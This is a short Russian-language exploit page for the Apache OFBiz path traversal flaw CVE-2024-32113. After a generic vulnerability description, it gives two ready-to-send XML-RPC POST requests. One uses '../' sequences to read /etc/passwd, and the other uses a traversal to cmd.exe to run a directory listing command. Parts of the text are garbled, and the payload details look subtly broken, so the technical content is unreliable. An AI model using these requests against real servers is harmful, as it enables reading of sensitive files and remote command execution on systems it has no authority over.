
Эксплойт для Apache OFBiz CVE-2024-32113 — обход пути через специально сформированные XML-RPC запросы, позволяющий читать произвольные файлы и потенциально выполнять команды на уязвимых серверах.
Критическая уязвимость была обнаружена в Apache OFBiz до версии 18.12.12. Затронута неизвестная функциональность. Манипуляция с неизвестным входным параметром приводит к уязвимости обхода пути. Продукт использует внешний ввод для построения имени пути, которое должно идентифицировать файл или каталог, расположенный внутри ограниченной родительской директории, но продукт не нейтрализует должным образом специальные элементы в имени пути, которые могут привести к тому, что путь разрешится в расположение за пределами ограниченной директории. Затрагиваются конфиденциальность, целостность и доступность.
../../../../../../etc/passwd, чтобы указать на файл etc/passwd на сервере Apache OFBiz.etc/passwd, содержащий конфиденциальную информацию о пользователях сервера.POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>